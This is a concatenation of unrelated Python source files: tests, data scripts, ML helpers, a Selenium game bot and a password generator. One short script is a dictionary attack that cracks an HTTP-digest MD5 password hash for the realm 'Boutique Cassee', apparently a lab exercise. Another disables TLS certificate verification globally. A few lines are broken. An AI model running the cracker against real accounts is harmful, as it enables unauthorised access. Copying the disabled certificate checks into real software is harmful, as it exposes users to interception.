            date_of_birth = datetime.date(1996, 9, 11),
            gender = "Female",
            registration_number = "SCT211-0002/2017",
            email = "anyangoc55@gmail.com",
            phone_number = "0746574811",
            date_joined = datetime.date.today(),
        )

    def test_full_name_contains_first_name(self):
        self.assertIn(self.student.first_name, self.student.full_name())

    def test_full_name_contains_last_name(self):
        self.assertIn(self.student.last_name, self.student.full_name())
self.assertIn(self.student.last_name, self.student.full_name())
class CreateStudentTestCase(TestCase):
    """Tests for the student creation form and view.

    BUG FIXES vs. the original:
      * several `def test add student view(self)`-style names contained
        spaces (syntax errors) — renamed to valid `test_*` identifiers;
      * `request.status code` / `self.bad data` were invalid attribute
        accesses — now `status_code` / `bad_data`;
      * dict keys had trailing spaces ("last_name " etc.), so the form never
        saw those fields;
      * `self.bad_data` was referenced but never defined — added in setUp;
      * the invalid-data form test asserted nothing and used valid data;
      * two duplicate `test_age_above_18` methods referenced `self.student`,
        which does not exist on this TestCase — removed (age validation is
        the Student model's concern, covered via clean()).
    """

    def setUp(self):
        # Keys must match the form field names exactly (no trailing spaces).
        self.data = {
            "first_name": "Nikki",
            "last_name": "Antonine",
            "date_of_birth": datetime.date(2006, 12, 12),
            "gender": "Female",
            "registration_number": "SCT211-0004/2017",
            "email": "antonine@gmail.com",
            "phone_number": "0742528493",
            "date_joined": datetime.date.today(),
        }
        # Deliberately incomplete payload for the rejection tests.
        self.bad_data = {"first_name": ""}

    def test_student_form_accepts_valid_data(self):
        form = StudentForm(self.data)
        self.assertTrue(form.is_valid())

    def test_student_form_rejects_invalid_data(self):
        form = StudentForm(self.bad_data)
        self.assertFalse(form.is_valid())

    def test_add_student_view(self):
        client = Client()
        url = reverse("add student")
        response = client.post(url, self.data)
        self.assertEqual(response.status_code, 200)

    def test_add_student_view_rejects_bad(self):
        client = Client()
        url = reverse("add student")
        response = client.post(url, self.bad_data)
        self.assertEqual(response.status_code, 400)
|
if __name__ == "__main__":
    from datetime import datetime
    from models import db, User, Tweet

    db.create_all()

    def _seed_user(username, email, tweet_texts):
        """Create one user, then one tweet per text, committing after each add."""
        user = User(username=username, email=email)
        db.session.add(user)
        db.session.commit()
        for text in tweet_texts:
            db.session.add(Tweet(
                content=text, author=user,
                pub_date=datetime.utcnow()
            ))
            db.session.commit()

    _seed_user('johann2357', 'johann2357@gmail.com',
               ["My first tweet!", "My second tweet!!", "My third tweet!!!"])
    _seed_user('tester', 'tester@gmail.com',
               ["Test tweet!", "Test twitter!"])
|
18,769 | 701a383516c7ac9c5493cde28bdb98addb94934d | # -*- coding: utf-8 -*-
"""
@author: Abhilash Raj
Unit Testing module for Steel Eye Assigment
"""
import unittest
from controller import load_config
from helper_functions import *
import os
class TestSteelEye(unittest.TestCase):
    """Integration tests for the Steel Eye helper functions.

    NOTE(review): several cases require artifacts (the source xml / zip)
    to already exist in the configured download path.
    """

    @classmethod
    def setUpClass(cls):
        """
        Class method calls once at the beginning of unit test
        """
        # loading the configuration
        config = load_config()
        cls.url = config.get("sourcefile", "xml_source_url")
        # Extracting csv file path
        cls.csv_path = config.get("csv", "csv_path")
        # Extracting the download path
        cls.download_path = config.get("download", "download_path")
        # Extracting the required s3 information from config
        cls.bucket_name = config.get("aws", "bucket_name")
        cls.aws_access_key_id = config.get("aws", "aws_access_key_id")
        cls.aws_secret_access_key = config.get("aws", "aws_secret_access_key")
        cls.region_name = config.get("aws", "region_name")

    def setUp(self):
        """Instance Method called everytime before a test case is executed"""
        # Path to xml files
        self.xmlfilepath = os.path.join(os.getcwd(), TestSteelEye.download_path)
        # Path to csv file
        self.csvfile = os.path.join(os.getcwd(), TestSteelEye.csv_path)

    def test_download(self):
        """Function to test download function"""
        # Test for all correct data
        self.assertEqual(
            download(TestSteelEye.url, self.xmlfilepath, "sourcefile.xml"),
            self.xmlfilepath + os.sep + "sourcefile.xml",
        )
        # Test for incorrect url
        self.assertEqual(
            download("http://example.com", self.xmlfilepath, "sourcefile.xml"), ""
        )
        # Test for different download path
        self.assertEqual(
            download(
                TestSteelEye.url,
                os.path.join(os.getcwd(), "anotherpath"),
                "sourcefile.xml",
            ),
            os.path.join(os.getcwd(), "anotherpath") + os.sep + "sourcefile.xml",
        )
        # Test for incorrect download path
        self.assertEqual(download(TestSteelEye.url, "E:", "sourcefile.xml"), "")

    def test_parse_source_xml(self):
        """Function to test parse_source_xml function"""
        # Path to the source xml
        file = self.xmlfilepath + os.sep + "sourcefile.xml"
        # Path to non existent source file
        in_file = self.xmlfilepath + os.sep + "sourcefile.pwg"
        # Test for correct data
        # NOTE : For this test case to pass the source xml file should be
        # present in the download path
        self.assertEqual(
            parse_source_xml(file),
            (
                "DLTINS_20210117_01of01.zip",
                "http://firds.esma.europa.eu/firds/DLTINS_20210117_01of01.zip",
            ),
        )
        # Test for incorrect data
        self.assertEqual(parse_source_xml(in_file), None)

    def test_unzip_file(self):
        """Function to test unzip_file function"""
        # Path to the compressed file
        zipped_file = os.path.join(self.xmlfilepath, "DLTINS_20210117_01of01.zip")
        # Test for correct data
        # NOTE : For this test case to pass the source xml zipped file
        # should be present in the download path
        self.assertTrue(unzip_file(zipped_file, self.xmlfilepath))
        # Test for wrong target path
        self.assertFalse(unzip_file(zipped_file, r"D:\kqcA CK j "))
        # Test for incorrect compressed file
        self.assertFalse(unzip_file("D:\somerandomfile", self.xmlfilepath))

    def test_create_csv(self):
        """Function to test create_csv funtion"""
        # absolute path to xml file to parse
        xml_file = os.path.join(self.xmlfilepath, "DLTINS_20210117_01of01.xml")
        # absolute path to the csv file to create
        csv_file = os.path.join(self.csvfile, "DLTINS_20210117_01of01.csv")
        # Test for correct data
        self.assertEqual(create_csv(xml_file, self.csvfile), csv_file)
        # Test for incorrect input xml file
        self.assertEqual(create_csv("somerandomfile", self.csvfile), None)
        # Test for incorrect path to write csv to
        self.assertEqual(create_csv(xml_file, r"D:\kqcA CK j "), None)

    def test_aws_s3_upload(self):
        """Function to test aws_s3_upload function

        BUG FIX: this method was named `aws_s3_upload` (no `test_` prefix),
        so unittest never discovered or executed it.
        """
        # absolute path to the csv file to create
        csv_file = os.path.join(self.csvfile, "DLTINS_20210117_01of01.csv")
        # Test for correct data
        self.assertTrue(
            aws_s3_upload(
                csv_file,
                self.region_name,
                self.aws_access_key_id,
                self.aws_secret_access_key,
                self.bucket_name,
            )
        )
        # Test for non existent region (this and the next comment were
        # swapped in the original)
        self.assertFalse(
            aws_s3_upload(
                csv_file,
                "useast",
                self.aws_access_key_id,
                self.aws_secret_access_key,
                self.bucket_name,
            )
        )
        # Test for non existent bucket
        self.assertFalse(
            aws_s3_upload(
                csv_file,
                self.region_name,
                self.aws_access_key_id,
                self.aws_secret_access_key,
                "nonexistentbucketname",
            )
        )
        # Test for incorrect keys
        self.assertFalse(
            aws_s3_upload(
                csv_file,
                self.region_name,
                "xjvachiahvlchabo;jvbo",
                "khkc vah haaih aih ika",
                self.bucket_name,
            )
        )
if __name__ == "__main__":
unittest.main()
|
18,770 | 721389f5f4d5a1faa9b63a5fc451c54cce818695 | import os
import tensorflow as tf
slim = tf.contrib.slim
def load_checkpoints(checkpoint_dir, saver):
    """Recover the saver's known-checkpoint list from checkpoint_dir, if any."""
    state = tf.train.get_checkpoint_state(checkpoint_dir)
    if state is None:
        print('No checkpoints found')
        return
    # Hand the full checkpoint list back to the saver so its save/restore
    # bookkeeping continues where the previous run left off.
    saver.recover_last_checkpoints(state.all_model_checkpoint_paths)
def get_global_step(sess, global_step_tensor):
    """Return the current value of the global-step tensor in this session."""
    return tf.train.global_step(sess, global_step_tensor)
def create_dir(dir):
    """
    Create a directory (including parents) if it does not already exist.

    Args:
        dir: directory to create
    """
    # exist_ok avoids the check-then-create race of the original
    # os.path.exists() / os.makedirs() pair.
    os.makedirs(dir, exist_ok=True)
def load_model_weights(sess, checkpoint_dir):
    """Restores the model weights.

    Loads the weights from checkpoint_dir onto the model, ignoring missing
    variables so that RPN-only checkpoints can be loaded onto AVOD.

    Args:
        sess: A TensorFlow session
        checkpoint_dir: Path to the weights to be loaded
    """
    restore_fn = slim.assign_from_checkpoint_fn(
        checkpoint_dir,
        slim.get_model_variables(),
        ignore_missing_vars=True)
    restore_fn(sess)
|
18,771 | 77104d0fdbe55bc315535eef532359b15c53263b | #
# Import needed modules
#
import csv
import random
#
# Create list of punctuations to pick from
#
punctuation = ['.','.',':','!','?',';','#','$','(',')','[',']','>','<','*']
#
# Read files with nouns and adjectives.
# BUG FIX: the original first opened noun_file/adj_file handles that were
# never read or closed (a resource leak) -- removed; csv.reader below opens
# its own handles.
#
nouns = csv.reader(open('noun.csv', 'r'))
adjective = csv.reader(open('adjectives.csv', 'r'))
#
# Flatten data, is csv with one column, want with one row
#
datan = sum([i for i in nouns],[]) #To flatten the list
dataa = sum([i for i in adjective],[]) #To flatten the list

print("The length of your password is one of the main factors to crack it")
print("It takes a hacker 0.25s to crack a password of 7 characters, 5 hours for 8, and 5 days for 9 characters ")
print("We recommend a password at least 10 characters long, however some services won't accept that long password yet")

# Ask until the user supplies a workable length (>= 4).
while True:
    pwlength=int(input("Please insert your required length of password: "))
    if pwlength <4:
        print("Sorry, this generator can not create a password shorter than 4 characters!")
    else:
        break

password = False
length = "short"
while password == False:
    # Draw adjective+NOUN pairs until the combination is long enough.
    while length == "short":
        randomnoun=(random.choice(datan))
        randomadj=(random.choice(dataa))
        # Pick two punctuation marks and a number between 0 and 100.
        # NOTE(review): the number may be three digits (100), so the final
        # password can exceed the requested length by one character.
        puncnumber=random.randint(0,len(punctuation)-1)
        number=random.randint(0,100)
        punctuate=(punctuation[puncnumber])
        puncrand=(random.choice(punctuation))
        textnumber=str(number)
        # Capitalize the noun, increasing safety of password
        noun=randomnoun.upper()
        unmixed=randomadj+noun
        if len(unmixed) >= pwlength:
            length = "long"
    # Trim to the requested length (reserving 4 characters for the two
    # punctuation marks and the number), then shuffle so the word
    # boundaries are not obvious.
    unmixed=unmixed[:pwlength-4]
    unmixed=unmixed+punctuate+puncrand+textnumber
    pwlist = list(unmixed)
    random.shuffle(pwlist)
    mixed="".join(pwlist)
    # Show the candidate password.
    print("\n"+mixed+"\n")
    answer = True
    while answer == True:
        question=input("Are you happy with this password? (y/n) ")
        if question == "y":
            print("Great, stay safe in the digital world!")
            password = True
        elif question == "n":
            print("Okay, we'll start over")
            # BUG FIX: reset the state machine so a fresh word pair is drawn.
            # The original left length == "long", so the outer loop re-sliced
            # the already-trimmed string and appended punctuation again,
            # producing a degenerate password on every retry.
            length = "short"
            answer = False
        else:
            print("We can only understand y/n answers!!")
            answer = True
|
18,772 | a4817c405627a1dd66b39929623677f3b24c3a06 | from atmPy.general import timeseries as _timeseries
from atmPy.data_archives.arm import _netCDF
class ArmDatasetSub(_netCDF.ArmDataset):
    """ARM tower dataset exposing relative humidity, temperature and vapor
    pressure at the 25 m and 60 m levels as time series."""

    def __init__(self,*args, **kwargs):
        # One sample per minute; time stamps are shifted back one period.
        self._data_period = 60.
        self._time_offset = (- self._data_period, 's')
        super(ArmDatasetSub,self).__init__(*args, **kwargs)

    def _parse_netCDF(self):
        """Read the tower variables from the netCDF file into time series."""
        super(ArmDatasetSub,self)._parse_netCDF()
        self.relative_humidity = self._read_variable2timeseries(['rh_25m', 'rh_60m'], column_name='Relative Humidity (%)')
        self.temperature = self._read_variable2timeseries(['temp_25m', 'temp_60m'], column_name='Temperature ($^{\circ}$C)')
        self.vapor_pressure = self._read_variable2timeseries(['vap_pres_25m', 'vap_pres_60m'], column_name='Vapor pressure (kPa)')

    def _data_quality_control(self):
        """Map the textual data_quality setting to a maximum flag value."""
        # BUG FIX: identity comparison with None instead of `== None`.
        if self.data_quality_flag_max is None:
            if self.data_quality == 'good':
                self.data_quality_flag_max = 0
            elif self.data_quality == 'patchy':
                # NOTE(review): same threshold as 'good' -- confirm intended.
                self.data_quality_flag_max = 0
            elif self.data_quality == 'bad':
                self.data_quality_flag_max = 100000
            else:
                # FIX: corrected "excepted values" wording in the message.
                txt = '%s is not an accepted value for data_quality ("good", "patchy", "bad")'%(self.data_quality)
                raise ValueError(txt)

    def plot_all(self):
        """Plot each of the three time series."""
        self.relative_humidity.plot()
        self.temperature.plot()
        self.vapor_pressure.plot()
def _concat_rules(arm_data_objs):
    """Concatenate several ArmDatasetSub objects into a single instance."""
    # create class
    out = ArmDatasetSub(False)
    # Concatenate each variable across the inputs and restore its data period.
    for attr in ('relative_humidity', 'temperature', 'vapor_pressure'):
        combined = _timeseries.concat([getattr(obj, attr) for obj in arm_data_objs])
        combined._data_period = out._data_period
        setattr(out, attr, combined)
    # use time stamps from one of the variables
    out.time_stamps = out.relative_humidity.data.index
    return out
|
18,773 | 4c0e6a7c1bb50743d79738add775a95beee696ed | import numpy as np
import matplotlib.pyplot as plt
def cross_section(R, L, F_C, show_every = 20, nr = 10, lagre = "N", fs = 10):
    """
    plot cross section of star
    :param R: radius, array
    :param L: luminosity, array
    :param F_C: convective flux, array
    :param show_every: plot every <show_every> steps
    :param nr: figure number used in the saved file name
    :param lagre: if "J", save the figure as "Figur<nr>.png"
    :param fs: font size for labels and legend
    """
    R_sun = 6.96E8 # [m]
    L_sun = 3.846E26 # [W]
    plt.figure(figsize = (10.5, 10))
    fig = plt.gcf()
    ax = plt.gca()
    # NOTE(review): the axis range uses R[0]/R_sun while circle radii below
    # are scaled by R[k]/np.max(R); these only line up when R[0] == max(R)
    # and R[0] is of order R_sun -- confirm intended.
    r_range = 1.2 * R[0] / R_sun
    rmax = np.max(R)
    ax.set_xlim(-r_range, r_range)
    ax.set_ylim(-r_range, r_range)
    ax.set_aspect('equal')
    # A shell counts as "inside the core" once L drops below 99.5% of L_sun.
    core_limit = 0.995 * L_sun
    j = 0
    for k in range(0, len(R) - 1):
        j += 1
        # plot every <show_every> steps
        if j%show_every == 0:
            if L[k] >= core_limit: # outside core
                if F_C[k] > 0.0: # plot convection outside core
                    circle_red = plt.Circle((0, 0), R[k] / rmax, color = 'red', fill = False)
                    ax.add_artist(circle_red)
                else: # plot radiation outside core
                    circle_yellow = plt.Circle((0, 0), R[k] / rmax, color = 'yellow', fill = False)
                    ax.add_artist(circle_yellow)
            else: # inside core
                if F_C[k] > 0.0: # plot convection inside core
                    circle_blue = plt.Circle((0, 0), R[k] / rmax, color = 'blue', fill = False)
                    ax.add_artist(circle_blue)
                else: # plot radiation inside core
                    circle_cyan = plt.Circle((0, 0), R[k] / rmax, color = 'cyan', fill = False)
                    ax.add_artist(circle_cyan)
    # create legends
    # (proxy circles are placed at 2*r_range, outside the axis limits, so
    # they only appear in the legend, never on the plot)
    circle_red = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'red', fill = True)
    circle_yellow = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'yellow', fill = True)
    circle_blue = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'blue', fill = True)
    circle_cyan = plt.Circle((2 * r_range, 2 * r_range), 0.1 * r_range, color = 'cyan', fill = True)
    ax.legend([circle_red, circle_yellow, circle_cyan, circle_blue], \
              ['Convection outside core', 'Radiation outside core', 'Radiation inside core', 'Convection inside core'], \
              fontsize = fs)
    plt.xlabel(r'$R/R_{\odot}$', fontsize = fs)
    plt.ylabel(r'$R/R_{\odot}$', fontsize = fs)
    plt.title('Cross section of star', fontsize = fs + 2)
    if lagre == "J":
        plt.savefig("Figur%02i.png"%nr)
    plt.show()
|
18,774 | 90ff1d16c3d8f5fbfe47f6b0a54946998ac4b086 | """
Calcula el espectro de Welch y sus intervalos de confianza segun la dist.
chi2. Se usa un overlap de 50% y se supone que no se hace ningun frequency-
band averaging.
La frecuencia de muestreo es Fs = 1.
@author: Julia Neme
"""
def welch_spectrum(x, npseg, alfa):
    """Welch PSD estimate with chi-squared confidence intervals.

    Uses 50% overlap, sampling frequency 1, and no frequency-band averaging.
    Also draws a variance-preserving (f * PSD) plot on a log-frequency axis.

    Args:
        x: input signal (1-D array-like).
        npseg: samples per segment (also used as the FFT length).
        alfa: significance level, e.g. 0.05 for a 95% interval.

    Returns:
        [f, Pxx, CI_dw, CI_up]: frequencies, PSD, lower and upper CIs.
    """
    import numpy as np  # BUG FIX: np was used below but never imported
    from scipy import signal
    from scipy.stats import chi2
    from matplotlib import pyplot as plt

    # Welch estimate with 50% overlap.
    ovlp = npseg/2
    f, Pxx = signal.welch(x, fs=1, nperseg=npseg, noverlap=ovlp)

    # Equivalent degrees of freedom for 50%-overlap Welch segments,
    # then the chi-squared interval scaled onto the PSD.
    ddof = np.round((8/3)*len(x)/npseg)
    c = chi2.ppf([1-alfa/2, alfa/2], ddof)
    c = ddof/c
    CI_dw = Pxx*c[0]
    CI_up = Pxx*c[1]

    plt.figure()
    plt.plot(f, f*Pxx, color='k')
    plt.fill_between(f, f*CI_dw, f*CI_up, color='k', alpha=.5)
    plt.xscale('log')
    plt.xlabel('log(f)')
    plt.ylabel('f*PSD')
    plt.show()
    plt.close()

    PSD = [f, Pxx, CI_dw, CI_up]
    return PSD
|
18,775 | bc9af89aef2c1e0e84f26a04fc3717d1de9b4045 | import json
import sys
from nbgrader.api import Gradebook, MissingEntry
# Parse command-line arguments: assignment id, notebook file name, student id.
# NOTE(review): sys.argv is not length-checked; missing args raise IndexError.
assignmentId = sys.argv[1]
notebookName = sys.argv[2]
studentId = sys.argv[3]
notebookId = notebookName.replace(".ipynb", "")
# Create the dict we are going to fill
output = dict()
# Create the connection to the database
with Gradebook('sqlite:///gradebook.db') as gb:
    # Try to find the submission in the database. If it doesn't exist, the
    # `MissingEntry` exception will be raised, which means notebook submission is not configured correctly
    try:
        submission = gb.find_submission_notebook(notebookId, assignmentId, studentId)
    except MissingEntry:
        output["fractionalScore"] = 0.0
        output["feedback"] = "Error while grading submission. Please check your submission."
    else:
        # Calculate score; guard against division by zero when the
        # notebook carries no points.
        if submission.max_score == 0:
            output["fractionalScore"] = 0.0
        else:
            frac_score = submission.score/submission.max_score
            output["fractionalScore"] = frac_score
        # Set the feedback value to show that the grading is complete
        output["feedback"] = "Your assignment has been graded"
# Set the feedbackType to match the generated feedback
output["feedbackType"] = "HTML"
# jsonify the output, print it for the logs, and persist it where the
# grading infrastructure expects it.
jsonified_output = json.dumps(output)
print('Feedback JSON: ' + jsonified_output)
with open("/shared/feedback.json", "w") as outfile:
    outfile.write(jsonified_output)
|
18,776 | 16e02e27713ae11f49c22cc601c63adf05bd1d99 | import cv2
from PIL import Image
# The five basic OpenCV thresholding modes to compare.
metodos = [
    cv2.THRESH_BINARY,
    cv2.THRESH_BINARY_INV,
    cv2.THRESH_TRUNC,
    cv2.THRESH_TOZERO,
    cv2.THRESH_TOZERO_INV
]
imagem = cv2.imread('bdcaptcha/telanova1.png')
# convert the image to grayscale
imagem_cinza = cv2.cvtColor(imagem, cv2.COLOR_RGB2GRAY)
i = 0
for metodo in metodos:
    i += 1
    # NOTE(review): `metodo or cv2.THRESH_OTSU` substitutes Otsu whenever
    # metodo is 0 (cv2.THRESH_BINARY == 0); a bitwise `metodo |
    # cv2.THRESH_OTSU` was probably intended -- confirm before changing.
    _, imagem_tratada = cv2.threshold(imagem_cinza, 127, 255, metodo or cv2.THRESH_OTSU)
    cv2.imwrite(f'testesmetodo/imagem_tratada_{i}.png', imagem_tratada)
# Re-binarize variant 3: any pixel darker than 115 becomes black on a
# fresh white palette image.
imagem = Image.open('testesmetodo/imagem_tratada_3.png')
imagem = imagem.convert('P')
imagem2 = Image.new('P', imagem.size, 255)
for x in range(imagem.size[1]):
    for y in range(imagem.size[0]):
        cor_pixel = imagem.getpixel((y, x))
        if cor_pixel < 115:
            imagem2.putpixel((y, x), 0)
imagem2.save('testesmetodo/imagemfinal.png')
|
18,777 | c8a653b521d8670271a7fb16c29613e1e49baced | from time import sleep
from selenium import webdriver
from selenium.common.exceptions import (NoSuchElementException,
StaleElementReferenceException)
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
chrome_driver_path = "/Users/anhollow/Programming/Utilities/chromedriver"
driver = webdriver.Chrome(executable_path=chrome_driver_path)
ignored_exceptions = (NoSuchElementException, StaleElementReferenceException)
def click_cookie():
    """Click the big cookie once, ignoring transient DOM errors."""
    try:
        cookie.click()
    except Exception:  # FIX: narrowed from a bare except (was also
        pass           # swallowing KeyboardInterrupt/SystemExit)
def buy_item(id):
    """Click the buy button with the given DOM id, if it can be located."""
    if (item := get_element(id)):
        try:
            item.click()
        except Exception:  # FIX: narrowed from bare except; the element may
            pass           # have gone stale — just skip this tick
def get_style(id):
    """Return the element's inline style attribute, or '' if unavailable."""
    style = None
    if (item := get_element(id)):
        try:
            style = item.get_attribute("style")
        except Exception:  # FIX: narrowed from bare except
            pass
    return style or ""
def get_class(id):
    """Return the element's class attribute, or '' if unavailable."""
    class_ = None
    if (item := get_element(id)):
        try:
            class_ = item.get_attribute('class')
        except Exception:  # FIX: narrowed from bare except
            pass
    return class_ or ""
def get_element(id):
    """Wait up to 10 s for the element with this DOM id; None on timeout."""
    try:
        return WebDriverWait(driver, 10, ignored_exceptions=ignored_exceptions).until(
            expected_conditions.presence_of_element_located((By.ID, id))
        )
    except Exception:  # FIX: narrowed from bare except; also removed the
        return None    # redundant `element if element else None` ternary
driver.get("http://orteil.dashnet.org/experiments/cookie/")
money = get_element("money")
things_to_buy = [
"buyElder Pledge",
"buyTime machine",
"buyPortal",
"buyAlchemy lab",
"buyShipment",
"buyMine",
"buyFactory",
"buyGrandma",
"buyCursor",
]
cookie = get_element("cookie")
while cookie:
for i in range(20):
click_cookie()
for _, id in enumerate(things_to_buy):
if id == "buyElder Pledge":
if "block" in get_style(id):
buy_item(id)
else:
if "grayed" not in get_class(id):
buy_item(id) |
18,778 | 9075bde74b050087521416807d4274f9b99160ae | from dataclasses import dataclass
from datetime import date, datetime
from typing_extensions import Annotated
from mashumaro import DataClassDictMixin
from mashumaro.config import BaseConfig
def test_annotated():
    """Annotated[date, ...] must (de)serialize exactly like a plain date."""
    @dataclass
    class DataClass(DataClassDictMixin):
        x: Annotated[date, None]

    obj = DataClass(date(2022, 2, 6))
    assert DataClass.from_dict({"x": "2022-02-06"}) == obj
    assert obj.to_dict() == {"x": "2022-02-06"}
def test_annotated_with_overridden_methods():
    """Per-annotation serialization strategies take precedence over the
    plain-type strategy, which serves as the fallback (field `baz`)."""
    @dataclass
    class DataClass(DataClassDictMixin):
        foo: Annotated[date, "foo"]
        bar: Annotated[date, "bar"]
        baz: Annotated[date, "baz"]

        class Config(BaseConfig):
            serialization_strategy = {
                Annotated[date, "foo"]: {
                    "serialize": date.toordinal,
                    "deserialize": date.fromordinal,
                },
                Annotated[date, "bar"]: {
                    "serialize": date.isoformat,
                    "deserialize": date.fromisoformat,
                },
                date: {
                    "serialize": lambda x: x.strftime("%Y%m%d"),
                    "deserialize": (
                        lambda x: datetime.strptime(x, "%Y%m%d").date()
                    ),
                },
            }

    obj = DataClass(
        foo=date(2023, 6, 12),
        bar=date(2023, 6, 12),
        baz=date(2023, 6, 12),
    )
    # BUG FIX: removed a stray `obj.foo.strftime("%Y%M%D")` statement whose
    # result was discarded (and whose format codes were bogus) — leftover
    # debug code.
    assert (
        DataClass.from_dict(
            {"foo": 738683, "bar": "2023-06-12", "baz": "20230612"}
        )
        == obj
    )
    assert obj.to_dict() == {
        "foo": 738683,
        "bar": "2023-06-12",
        "baz": "20230612",
    }
|
18,779 | cccd87b27e96d956c244bf0ea2199ad8e94e1f9f | import logging
from rest_framework.renderers import JSONRenderer
from api.v1.user.serializers import UserSerializer
from support.models import SupportRequest
from user.autologout import SessionExpire
# format json response
# https://google-styleguide.googlecode.com/svn/trunk/jsoncstyleguide.xml
class ApiRenderer(JSONRenderer):
    """JSON renderer wrapping every payload in a versioned envelope:
    {"version": "2", "data": ..., "meta": ..., ["error": ...]}."""

    def render(self, data, media_type=None, renderer_context=None):
        """
        NB. be sure that settings.REST_FRAMEWORK contains:
        'EXCEPTION_HANDLER': '...api_exception_handler',
        """
        logger = logging.getLogger(__name__)
        wrapper = {
            'version': '2',
            'data': {},
            'meta': {},
        }
        # move error to the root level
        if hasattr(data, 'get') and data.get('error'):
            wrapper['error'] = data['error']
            del data['error']
        if data is not None:
            wrapper['data'] = data
        try:
            response = renderer_context['response']
            request = renderer_context['request']
            # Only successful (non-error) responses get session/support meta.
            if 200 <= response.status_code < 400:
                meta = {}
                session_expire = SessionExpire(request)
                meta['session_expires_on'] = session_expire.expire_time()
                # Attach the active support-request context, if any.
                sr = SupportRequest.get_current(request, as_obj=True)
                if sr:
                    meta['support_request'] = {
                        'ticket': sr.ticket,
                        'user': UserSerializer(instance=sr.user).data,
                    }
                wrapper['meta'] = meta
        except (TypeError, KeyError) as e:
            # renderer_context may be None or missing keys (schema views etc.)
            logger.error("Missing parameteres (%s)", e)
        return super(ApiRenderer, self).render(wrapper, media_type,
                                               renderer_context)
|
18,780 | 1c4867421c67b9e19ee0d72cbd36f5451733abd4 | import hashlib
# Load the candidate word list (one word per line).
# FIX: context manager instead of manual open/readlines/close.
with open('words.txt', 'r') as wordfile:
    word_list = [line.strip() for line in wordfile]

username= input("Username: ")
realm = "Boutique Cassee"

#178ec06684f4d2ca85f4d704eff5ac1d
hashToFind = input("Password hash: ")

# HTTP-digest-style credential hash: MD5("username:realm:password").
for word in word_list:
    u_p = username+":"+realm+":"+word
    # FIX: renamed the local so it no longer shadows the builtin hash().
    digest = hashlib.md5(u_p.encode()).hexdigest()
    if digest == hashToFind:
        print('The password is: ',word)
        break  # FIX: stop at the first match instead of scanning the rest
|
18,781 | fc0a5095c7f20f9bff5de1c582d3acbcb8b279bd | #!/usr/bin/python
import itertools
#lines: Prime numbers sieve w/fancy generators
def iter_primes():
    """Yield primes indefinitely via a lazy sieve of stacked filters.

    Each yielded prime adds one filter layer that removes its multiples
    from the remaining number stream.
    """
    numbers = itertools.count(2)
    while True:
        prime = next(numbers)  # BUG FIX: Py3 next(), not Py2 .next()
        yield prime
        # BUG FIX: builtin filter() replaces Py2-only itertools.ifilter.
        numbers = filter(prime.__rmod__, numbers)

# Print all primes up to 500.
for p in iter_primes():
    if p > 500:
        break
    print(p)  # BUG FIX: print() function, not the Py2 print statement
|
18,782 | 5d4d9f6d9a4685d11662a2f31bab7039b81d6780 | # Задача 2. Вариант 10.
# Напишите программу, которая будет выводить на экран наиболее понравившееся вам высказывание,
# автором которого является Юстиниан. Не забудьте о том, что автор должен быть упомянут на отдельной строке.
# Kondrashkina
# 15.09.2016
print ("Свобода есть естественная способность каждого делать то, что ему угодно, если это не запрещено силой или правом.")
print ("")
print (" Юстиниан.")
input ("\n\nНажмите Enter для выхода.")
|
18,783 | 7dc2068907e87e7f4ab7c28b5cefbcc7cf2c682d | import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import argparse
import tensorflow as tf
import tensorflow_hub as hub
import h5py
import numpy as np
import json
print((tf.__version__))
from util import set_gpus
def Elmo(fn, outfn):
    """Compute ELMo embeddings for every sentence of a jsonlines file.

    Args:
        fn: path to a jsonlines file whose records carry "sentences" and
            "doc_key" fields.
        outfn: HDF5 file to write; one dataset per sentence, keyed
            "<doc_key>_<sentence_index>", shaped [slen, lm_size, lm_layers].
    """
    with open(fn) as f:
        dev_examples = [json.loads(jsonline) for jsonline in f.readlines()]

    sents = [example["sentences"] for example in dev_examples]
    docids = [example["doc_key"] for example in dev_examples]
    config = tf.ConfigProto()
    with tf.Session(config=config) as sess:
        sess.run(tf.global_variables_initializer())
        with h5py.File(outfn) as fout:
            for i in range(len(sents)):
                if i % 100 == 0:
                    print('Finished ' + str(i))
                doc = sents[i]
                docid = docids[i]
                # One session run per sentence (batch of 1).
                for j in range(len(doc)):
                    sent = [doc[j]]
                    slen = [len(doc[j])]
                    lm_emb = sess.run(
                        lm_emb_op, feed_dict={
                            sentences: sent,
                            text_len: slen
                        }
                    )
                    sentence_id = docid + '_' + str(j)
                    fout.create_dataset(
                        sentence_id, lm_emb.shape[1:], dtype='float32',
                        data=lm_emb[0, :, :, :]  # [slen, lm_size, lm_layers]
                    )
    # BUG FIX: the original ended with `fout.close` (an attribute access
    # that never called the method); the `with` block above closes the file.
#### Model #####
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True)
parser.add_argument('--output', required=True)
args = parser.parse_args()
set_gpus(0)
# Pretrained ELMo module from TF Hub.
elmo = hub.Module("https://tfhub.dev/google/elmo/1", trainable=True)
# Placeholders: a batch of tokenized sentences and their lengths.
sentences = tf.placeholder('string', shape=(None, None))
text_len = tf.placeholder('int32', shape=(None))
print("READY TO PARSE ELMO")
lm_embeddings = elmo(
    inputs={
        "tokens": sentences,
        "sequence_len": text_len
    },
    signature="tokens", as_dict=True)
# The 512-d context-independent word embedding is concatenated with itself
# to match the 1024-d LSTM layers, then all three are stacked on axis 3.
word_emb = tf.expand_dims(lm_embeddings["word_emb"], 3) # [B, slen, 512]
lm_emb_op = tf.concat([
    tf.concat([word_emb, word_emb], 2), # [B, slen, 1024, 1]
    tf.expand_dims(lm_embeddings["lstm_outputs1"], 3),
    tf.expand_dims(lm_embeddings["lstm_outputs2"], 3)], 3) # [B, slen, 1024, 3]
Elmo(args.input, args.output)
|
18,784 | aef5b547fa904e2f061b7ca22c9181ab064310da | import nltk
nltk.download('stopwords')
nltk.download('wordnet')
from nltk.corpus import stopwords
from nltk.corpus import wordnet
# WordNet senses that mark a token as medically relevant (illnesses, drugs,
# symptoms, body parts, ...); used as a whitelist by QueryFormulator.
wn_senses = set()
wn_senses.update(['illness.n.01', 'disorder.n.01', 'medicine.n.02', 'drug.n.01',
                  'ill_health.n.01', 'injury.n.01', 'distress.n.01',
